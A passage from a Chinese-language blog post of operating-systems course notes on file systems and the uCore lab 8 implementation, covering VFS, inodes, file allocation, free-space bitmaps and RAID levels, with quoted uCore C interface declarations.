System）</li><li>特定文件系统模块</li></ul></li><li><p><strong>虚拟文件系统（VFS）</strong></p><ul><li>目的：对所有不同文件系统的抽象</li><li>功能：<ul><li>提供相同的文件和文件系统<strong>接口</strong></li><li>管理所有文件和文件系统关联的<strong>数据结构</strong></li><li>高效查询<strong>例程</strong>，遍历文件系统</li><li>与特定文件系统模块的<strong>交互</strong></li></ul></li></ul></li><li><p><strong>文件系统基本数据结构</strong></p><ul><li>文件卷控制块（Unix： <code>superblock</code>)<ul><li>每个文件系统一个</li><li>文件系统详细信息</li><li>块、块大小、空余块、计数/指针等</li></ul></li><li>文件控制块（Unix: <code>vnode</code> or <code>inode</code>)<ul><li>每个文件一个</li><li>文件详细信息</li><li>访问权限、拥有者、大小、数据块位置等</li></ul></li><li>目录项（Linux: <code>dentry</code>）<ul><li>每个目录项一个（目录和文件）</li><li>将目录项数据结构及树型布局编码成树型数据结构</li><li>指向文件控制块、父目录、子目录等</li></ul></li></ul></li><li><p><strong>文件系统的存储结构</strong></p><ul><li>文件系统数据结构：<strong>卷控制块、文件控制块、目录节点</strong></li><li>持久存储在外存中：存储设备的数据块中</li><li>当需要时加载进内存<ul><li>卷控制模块：当文件系统挂载时进入内存</li><li>文件控制块：当文件被访问时进入内存</li><li>目录节点：在遍历一个文件路径时进入内存</li></ul></li></ul></li></ul><h3 id="5-文件缓存和打开文件">5. 文件缓存和打开文件</h3><ul><li><p>数据块缓存</p><ul><li>数据块按需读入内存<ul><li>提供read()操作</li><li>预读：预先读取后面的数据块</li></ul></li><li>数据块使用后被缓存<ul><li>假设数据将会再次用到</li><li>写操作可能被缓存和延迟写入</li></ul></li><li>两种数据块缓存方式<ul><li>数据块缓存</li><li>页缓存：统一缓存数据块和内存页</li></ul></li></ul></li><li><p>页缓存</p><ul><li><strong>虚拟页式存储</strong>：在虚拟地址空间中虚拟页面可映射到本地外存文件中</li><li><strong>文件数据块的页缓存</strong><ul><li>在虚拟内存中文件数据块被映射成页</li><li>文件的读写操作被转换成对内存的访问</li><li>可能导致缺页或设置为脏页</li><li><strong>存在的问题：页置换算法需要协调虚拟存储和页缓存间的页面数</strong></li></ul></li></ul></li><li><p>文件系统中打开文件的数据结构</p><ul><li>文件描述符<ul><li>每个被打开的文件都有一个文件描述符</li><li>文件状态信息：目录项、当前文件指针、文件操作设置等</li></ul></li><li>打开文件表<ul><li>每个进程都有一个<strong>进程打开文件表</strong></li><li>一个系统级的打开文件表</li><li>有文件被打开时，文件卷就不能被卸载</li></ul></li></ul></li><li><p>打开文件锁</p><blockquote><p>一些文件系统提供文件锁，用于协调多进程的文件访问</p></blockquote><ul><li><strong>强制</strong>——根据锁保持情况和访问需求确定是否拒绝访问</li><li><strong>劝告</strong>——进程可以查找锁的状态来决定怎么处理</li></ul></li></ul><h3 id="6-文件分配">6. 文件分配</h3><ul><li>文件大小<ul><li>大多数文件都很小<ul><li>需要对小文件提供很好的支持</li><li>块空间不能太大</li></ul></li><li>一些文件非常大<ul><li>必须支持大文件（64位文件偏移）</li><li>大文件访问需要高效</li></ul></li></ul></li><li>文件分配<ul><li>如何表示分配给一个文件数据块的位置和顺序</li><li>分配方式：连续分配、链式分配、索引分配</li><li>指标：存储效率（外部碎片等）、读写性能（访问速度等）</li></ul></li></ul><h4 id="a-连续分配">a. 连续分配</h4><ul><li>文件头指定起始块和长度</li><li>分配策略：<strong>最先匹配、最佳匹配</strong></li><li>优点：文件读取表现好；<strong>高效的顺序和随机访问</strong></li><li>缺点：<ul><li><strong>碎片严重！</strong></li><li><strong>文件大小如何增长？</strong> 预分配 ？ / 按需分配？</li></ul></li></ul><h4 id="b-链式分配">b. 链式分配</h4><ul><li>文件以数据块链表方式存储</li><li>文件头包含了到第一块和最后一块的指针</li><li>优点<ul><li>创建、增大、缩小很容易</li><li>没有碎片</li></ul></li><li>缺点<ul><li>无法实现真正的随机访问</li><li>可靠性差：破坏一个链，后面的数据块全部丢失</li></ul></li></ul><h4 id="c-索引分配">c. 索引分配</h4><ul><li>为每个文件创建一个<strong>索引数据块</strong>，该索引数据块是指向文件数据块的指针列表</li><li>文件头包含了索引数据块指针列表</li><li>优点<ul><li>创建、增大、缩小很容易</li><li>没有碎片</li><li>支持直接访问</li></ul></li><li>缺点<ul><li>当文件很小时，存储索引的开销大</li><li>不便于处理大文件</li></ul></li></ul><h5 id="大文件的索引分配">大文件的索引分配</h5><ul><li>使用链式索引块：将多个索引块以链表的方式串联起来</li><li>多级索引块：一个一级索引块指向多个二级索引块等等</li></ul><h4 id="d-UFS多级索引分配">d. UFS多级索引分配</h4><p><img src="/2020/09/uCore-8/UFS_indexSearch.png" alt="img"></p><ul><li>文件头包含13个指针<ul><li>前10个指针指向数据块</li><li>第11个指针指向索引块</li><li>第12个指针指向二级索引块</li><li>第13个指针指向三级索引块</li></ul></li><li>效果<ul><li>提高了文件大小限制阈值</li><li>动态分配数据块，文件扩展很容易</li><li>小文件开销小</li><li>只为大文件分配间接数据块，大文件在访问数据块时需要大量查询</li></ul></li></ul><h3 id="7-空闲空间管理">7. 空闲空间管理</h3><p>跟踪记录文件卷中未分配的数据块</p><blockquote><p>采用什么数据结构表示空闲空间列表？</p></blockquote><ul><li>位图<ul><li>用位图代表空闲数据块列表<ul><li><code>11111110011001001010010101</code></li><li>$D_i = 0$表示数据块$i$是空闲，否则表示已分配</li></ul></li><li>使用简单但可能会是一个大的向量表<ul><li>160GB磁盘 -&gt; 40MB数据块 -&gt; 5MB位图</li><li>假定空闲空间在磁盘中均匀分布，则找到<code>0</code>前需要扫描<strong>磁盘数据块总数/空闲块数目</strong></li></ul></li></ul></li><li>链表</li><li>链式索引</li></ul><h3 id="8-冗余磁盘矩阵RAID">8. 冗余磁盘矩阵RAID</h3><h4 id="a-基本概念">a. 基本概念</h4><ul><li><p>磁盘分区</p><blockquote><p>通常磁盘通过分区来最大限度减小寻道时间</p></blockquote><ul><li>分区是一组柱面的集合</li><li>每个分区都可视为逻辑上独立的磁盘</li></ul><p><img src="/2020/09/uCore-8/divideArea.png" alt="img"></p></li><li><p>一个典型的磁盘文件系统组织</p><ul><li><p>文件卷：一个拥有完整文件系统实例的外存空间，通常常驻在磁盘的单个分区上</p></li><li><p><img src="/2020/09/uCore-8/diskFileSystem.png" alt="img"></p></li></ul></li><li><p>多磁盘管理</p><ul><li>使用多磁盘可改善<ul><li>吞吐量（通过并行）</li><li>可靠性和可用性（通过冗余）</li></ul></li><li>冗余磁盘阵列（RAID，Redundant Array of Inexpensive disks）<ul><li>多种磁盘管理技术</li><li>RAID分类：RAID-0、RAID-1、RAID-5</li></ul></li><li>冗余磁盘阵列的实现<ul><li>软件：操作系统内核的文件卷管理</li><li>硬件：RAID硬件控制器（I/O）</li></ul></li></ul></li></ul><h4 id="b-RAID-0：磁盘条带化">b. RAID-0：磁盘条带化</h4><blockquote><p>基于数据块的条带化</p></blockquote><p>把数据块分成多个子块，存储在独立的磁盘中</p><blockquote><p>通过独立磁盘上并行数据块访问提供更大的磁盘带宽</p></blockquote><p><img src="/2020/09/uCore-8/raid0.png" alt="img"></p><h4 id="c-RAID-1：磁盘镜像">c. RAID-1：磁盘镜像</h4><p>向两个磁盘写入，从任何一个读取</p><ul><li>可靠性成倍增加</li><li>读取性能线性增加</li></ul><p><img src="/2020/09/uCore-8/raid1.png" alt="img"></p><h4 id="d-RAID-4：带校验的磁盘条带化">d. RAID-4：带校验的磁盘条带化</h4><blockquote><p>基于数据块的条带化</p></blockquote><p>数据块级的磁盘条带化加专用奇偶校验磁盘</p><blockquote><p>允许从任意一个故障磁盘中恢复</p></blockquote><p><img src="/2020/09/uCore-8/raid4.png" alt="img"></p><h4 id="e-RAID-5：带分布式校验的磁盘条带化">e. RAID-5：带分布式校验的磁盘条带化</h4><blockquote><p>基于数据块的条带化</p></blockquote><p><img src="/2020/09/uCore-8/raid5.png" alt="img"></p><h4 id="f-可纠正多个磁盘错误的冗余磁盘阵列">f. 可纠正多个磁盘错误的冗余磁盘阵列</h4><ul><li>RAID-5：每组条带块有一个奇偶校验块，允许一个磁盘错误</li><li>RAID-6：每组条带块有两个冗余块，允许两个磁盘错误</li></ul><h4 id="g-RAID嵌套">g. RAID嵌套</h4><ul><li><p>RAID 0+1</p><p><img src="/2020/09/uCore-8/raid01.png" alt="img"></p></li><li><p>RAID 1+0</p><p><img src="/2020/09/uCore-8/raid10.png" alt="img"></p></li></ul><h3 id="9-uCore文件系统实现">9. uCore文件系统实现</h3><h4 id="a-uCore文件系统概述">a. uCore文件系统概述</h4><p>操作系统中负责管理和存储可长期保存数据的软件功能模块称为文件系统。在本次试验中，主要侧重文件系统的设计实现和对文件系统执行流程的分析与理解。</p><p>ucore的文件系统模型源于Havard的OS161的文件系统和Linux文件系统。但其实这二者都是源于传统的UNIX文件系统设计。UNIX提出了四个文件系统抽象概念：文件(file)、目录项(dentry)、索引节点(inode)和安装点(mount point)。</p><ul><li><strong>文件</strong>：UNIX文件中的内容可理解为是一有序字节buffer，文件都有一个方便应用程序识别的文件名称（也称文件路径名）。典型的文件操作有读、写、创建和删除等。</li><li><strong>目录项</strong>：目录项不是目录（又称文件路径），而是目录的组成部分。在UNIX中目录被看作一种特定的文件，而目录项是文件路径中的一部分。如一个文件路径名是“/test/testfile”，则包含的目录项为：根目录“/”，目录“test”和文件“testfile”，这三个都是目录项。一般而言，目录项包含目录项的名字（文件名或目录名）和目录项的索引节点（见下面的描述）位置。</li><li><strong>索引节点</strong>：UNIX将文件的相关元数据信息（如访问控制权限、大小、拥有者、创建时间、数据内容等等信息）存储在一个单独的数据结构中，该结构被称为索引节点。</li><li><strong>安装点</strong>：在UNIX中，文件系统被安装在一个特定的文件路径位置，这个位置就是安装点。所有的已安装文件系统都作为根文件系统树中的叶子出现在系统中。</li></ul><p>上述抽象概念形成了UNIX文件系统的逻辑数据结构，并需要通过一个具体文件系统的架构设计与实现把上述信息映射并储存到磁盘介质上，从而在具体文件系统的磁盘布局（即数据在磁盘上的物理组织）上具体体现出上述抽象概念。</p><blockquote><p>比如文件元数据信息存储在磁盘块中的索引节点上。当文件被载入内存时，内核需要使用磁盘块中的索引点来构造内存中的索引节点。</p></blockquote><p>ucore模仿了UNIX的文件系统设计，ucore的文件系统架构主要由四部分组成：</p><ul><li><strong>通用文件系统访问接口层</strong>：该层提供了一个从用户空间到文件系统的标准访问接口。这一层访问接口让应用程序能够通过一个简单的接口获得ucore内核的文件系统服务。</li><li><strong>文件系统抽象层</strong>：向上提供一个一致的接口给内核其他部分（文件系统相关的系统调用实现模块和其他内核功能模块）访问。向下提供一个同样的抽象函数指针列表和数据结构屏蔽不同文件系统的实现细节。</li><li><strong>Simple FS文件系统层</strong>：一个基于索引方式的简单文件系统实例。向上通过各种具体函数实现以对应文件系统抽象层提出的抽象函数。向下访问外设接口</li><li><strong>外设接口层</strong>：向上提供device访问接口屏蔽不同硬件细节。向下实现访问各种具体设备驱动的接口，比如disk设备接口/串口设备接口/键盘设备接口等。</li></ul><p>对照上面的层次我们再大致介绍一下文件系统的访问处理过程，加深对文件系统的总体理解。假如应用程序操作文件（打开/创建/删除/读写），首先需要通过文件系统的通用文件系统访问接口层给用户空间提供的访问接口进入文件系统内部，接着由文件系统抽象层把访问请求转发给某一具体文件系统（比如SFS文件系统），具体文件系统（Simple FS文件系统层）把应用程序的访问请求转化为对磁盘上的block的处理请求，并通过外设接口层交给磁盘驱动例程来完成具体的磁盘操作。结合用户态写文件函数write的整个执行过程，我们可以比较清楚地看出ucore文件系统架构的层次和依赖关系。</p><p><img src="https://chyyuu.gitbooks.io/ucore_os_docs/content/lab8_figs/image001.png" alt="image"></p><p><strong>ucore文件系统总体结构</strong></p><p>从ucore操作系统不同的角度来看，ucore中的文件系统架构包含四类主要的数据结构, 它们分别是：</p><ul><li><strong>超级块（SuperBlock）</strong>，它主要从文件系统的全局角度描述特定文件系统的全局信息。它的作用范围是整个OS空间。</li><li><strong>索引节点（inode）</strong>：它主要从文件系统的单个文件的角度它描述了文件的各种属性和数据所在位置。它的作用范围是整个OS空间。</li><li><strong>目录项（dentry）</strong>：它主要从文件系统的文件路径的角度描述了文件路径中的一个特定的目录项（注：一系列目录项形成目录/文件路径）。它的作用范围是整个OS空间。对于SFS而言，inode(具体为struct sfs_disk_inode)对应于物理磁盘上的具体对象，dentry（具体为struct sfs_disk_entry）是一个内存实体，其中的ino成员指向对应的inode number，另外一个成员是file name(文件名).</li><li><strong>文件（file）</strong>，它主要从进程的角度描述了一个进程在访问文件时需要了解的文件标识，文件读写的位置，文件引用情况等信息。它的作用范围是某一具体进程。</li></ul><p>如果一个用户进程打开了一个文件，那么在ucore中涉及的相关数据结构（其中相关数据结构将在下面各个小节中展开叙述）和关系如下图所示：</p><p><img src="https://chyyuu.gitbooks.io/ucore_os_docs/content/lab8_figs/image002.png" alt="image"></p><p>先上一张相关数据结构的关联图</p><blockquote><p>自己画的太丑了T_T，该图来源<a href="http://www.resery.top/">resery</a></p></blockquote><p><img src="/2020/09/uCore-8/fsStruct.png" alt="img"></p><p>文件系统整体结构</p><p><img src="/2020/09/uCore-8/total_struct.png" alt="img"></p><p>我们先从上到下分析一下结构</p><h4 id="b-文件系统结构">b. 文件系统结构</h4><h5 id="1-通用文件系统访问接口层">1) 通用文件系统访问接口层</h5><p>在内核中，通用的文件相关的函数分别是以下这些函数，同时也是我们在uCore中最常使用的函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_open</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span></span>;        <span class="comment">// Open or create a file. FLAGS/MODE per the syscall.</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_close</span><span class="params">(<span class="type">int</span> fd)</span></span>;                                      <span class="comment">// Close a vnode opened  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len)</span></span>;               <span class="comment">// Read file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_write</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len)</span></span>;              <span class="comment">// Write file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_seek</span><span class="params">(<span class="type">int</span> fd, <span class="type">off_t</span> pos, <span class="type">int</span> whence)</span></span>;                <span class="comment">// Seek file  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_fstat</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> stat *stat)</span></span>;                   <span class="comment">// Stat file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_fsync</span><span class="params">(<span class="type">int</span> fd)</span></span>;                                      <span class="comment">// Sync file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_chdir</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                            <span class="comment">// change DIR  </span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_mkdir</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                            <span class="comment">// create DIR</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_link</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path1, <span class="type">const</span> <span class="type">char</span> *path2)</span></span>;         <span class="comment">// set a path1&#x27;s link as path2</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_rename</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path1, <span class="type">const</span> <span class="type">char</span> *path2)</span></span>;       <span class="comment">// rename file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_unlink</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path)</span></span>;                           <span class="comment">// unlink a path</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_getcwd</span><span class="params">(<span class="type">char</span> *buf, <span class="type">size_t</span> len)</span></span>;                      <span class="comment">// get current working directory</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_getdirentry</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> dirent *direntp)</span></span>;        <span class="comment">// get the file entry in DIR</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_dup</span><span class="params">(<span class="type">int</span> fd1, <span class="type">int</span> fd2)</span></span>;                              <span class="comment">// duplicate file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_pipe</span><span class="params">(<span class="type">int</span> *fd_store)</span></span>;                                <span class="comment">// build PIPE</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sysfile_mkfifo</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">uint32_t</span> open_flags)</span></span>;      <span class="comment">// build named PIPE</span></span><br></pre></td></tr></table></figure><p>在这些<code>sysfile_xx</code>函数中，调用的下一层函数分别是封装好的各个<code>file_xx</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_close</span><span class="params">(<span class="type">int</span> fd)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_write</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_seek</span><span class="params">(<span class="type">int</span> fd, <span class="type">off_t</span> pos, <span class="type">int</span> whence)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_fstat</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> stat *stat)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_fsync</span><span class="params">(<span class="type">int</span> fd)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_getdirentry</span><span class="params">(<span class="type">int</span> fd, <span class="keyword">struct</span> dirent *dirent)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_dup</span><span class="params">(<span class="type">int</span> fd1, <span class="type">int</span> fd2)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_pipe</span><span class="params">(<span class="type">int</span> fd[])</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_mkfifo</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">uint32_t</span> open_flags)</span></span>;</span><br></pre></td></tr></table></figure><p>通常来讲，这些函数都会操作当前进程访问文件的数据接口，即<code>current-&gt;filesp</code>。该<code>struct files_struct</code>结构如下所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * process&#x27;s file related informaction</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">files_struct</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *pwd;      <span class="comment">// inode of present working directory</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *fd_array;  <span class="comment">// opened files array</span></span><br><span class="line">    <span class="type">int</span> files_count;        <span class="comment">// the number of opened files</span></span><br><span class="line">    <span class="type">semaphore_t</span> files_sem;  <span class="comment">// lock protect sem</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>该结构中包含了当前进程的工作路径、所打开的文件数组集合以及信号量等。</p><p>在<code>fd_array</code>数组中，每个进程打开的文件所对应的索引，就是该文件在该进程所对应的文件描述符。</p><blockquote><p>即不同进程打开文件时，返回的文件描述符可能时是不一样的。</p></blockquote><h5 id="2-文件系统抽象层-VFS">2) 文件系统抽象层(VFS)</h5><h6 id="VFS接口与数据结构">VFS接口与数据结构</h6><blockquote><p>文件系统抽象层是把不同文件系统的对外共性接口提取出来，形成一个函数指针数组，这样，通用文件系统访问接口层只需访问文件系统抽象层，而不需关心具体文件系统的实现细节和接口。</p></blockquote><p>系统接口再下一层就到了<code>VFS</code>虚拟文件系统。VFS函数涉及到了文件结构<code>struct file</code>。该结构体指定了文件的相关类型，包括读写权限，文件描述符<code>fd</code>，当前读取到的位置<code>pos</code>，文件系统中与硬盘特定区域所对应的结点<code>node</code>，以及打开的引用次数<code>open_count</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> &#123;</span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        FD_NONE, FD_INIT, FD_OPENED, FD_CLOSED,</span><br><span class="line">    &#125; status;</span><br><span class="line">    <span class="type">bool</span> readable;</span><br><span class="line">    <span class="type">bool</span> writable;</span><br><span class="line">    <span class="type">int</span> fd;</span><br><span class="line">    <span class="type">off_t</span> pos; <span class="comment">// 下一次写入的起始位置</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span class="type">int</span> open_count;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>虚拟文件系统中，所使用的相关函数接口分别是</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Virtual File System layer functions.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The VFS layer translates operations on abstract on-disk files or</span></span><br><span class="line"><span class="comment"> * pathnames to operations on specific files on specific filesystems.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_cleanup</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">vfs_devlist_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer low-level operations.</span></span><br><span class="line"><span class="comment"> * See inode.h for direct operations on inodes.</span></span><br><span class="line"><span class="comment"> * See fs.h for direct operations on filesystems/devices.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_set_curdir   - change current directory of current thread by inode</span></span><br><span class="line"><span class="comment"> *    vfs_get_curdir   - retrieve inode of current directory of current thread</span></span><br><span class="line"><span class="comment"> *    vfs_get_root     - get root inode for the filesystem named DEVNAME</span></span><br><span class="line"><span class="comment"> *    vfs_get_devname  - get mounted device name for the filesystem passed in</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_set_curdir</span><span class="params">(<span class="keyword">struct</span> inode *dir)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_curdir</span><span class="params">(<span class="keyword">struct</span> inode **dir_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_root</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> inode **root_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">const</span> <span class="type">char</span> *<span class="title">vfs_get_devname</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer high-level operations on pathnames</span></span><br><span class="line"><span class="comment"> * Because namei may destroy pathnames, these all may too.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_open         - Open or create a file. FLAGS/MODE per the syscall.</span></span><br><span class="line"><span class="comment"> *    vfs_close  - Close a inode opened with vfs_open. Does not fail.</span></span><br><span class="line"><span class="comment"> *                 (See vfspath.c for a discussion of why.)</span></span><br><span class="line"><span class="comment"> *    vfs_link         - Create a hard link to a file.</span></span><br><span class="line"><span class="comment"> *    vfs_symlink      - Create a symlink PATH containing contents CONTENTS.</span></span><br><span class="line"><span class="comment"> *    vfs_readlink     - Read contents of a symlink into a uio.</span></span><br><span class="line"><span class="comment"> *    vfs_mkdir        - Create a directory. MODE per the syscall.</span></span><br><span class="line"><span class="comment"> *    vfs_unlink       - Delete a file/directory.</span></span><br><span class="line"><span class="comment"> *    vfs_rename       - rename a file.</span></span><br><span class="line"><span class="comment"> *    vfs_chdir  - Change current directory of current thread by name.</span></span><br><span class="line"><span class="comment"> *    vfs_getcwd - Retrieve name of current directory of current thread.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_open</span><span class="params">(<span class="type">char</span> *path, <span class="type">uint32_t</span> open_flags, <span class="keyword">struct</span> inode **inode_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_close</span><span class="params">(<span class="keyword">struct</span> inode *node)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_link</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span 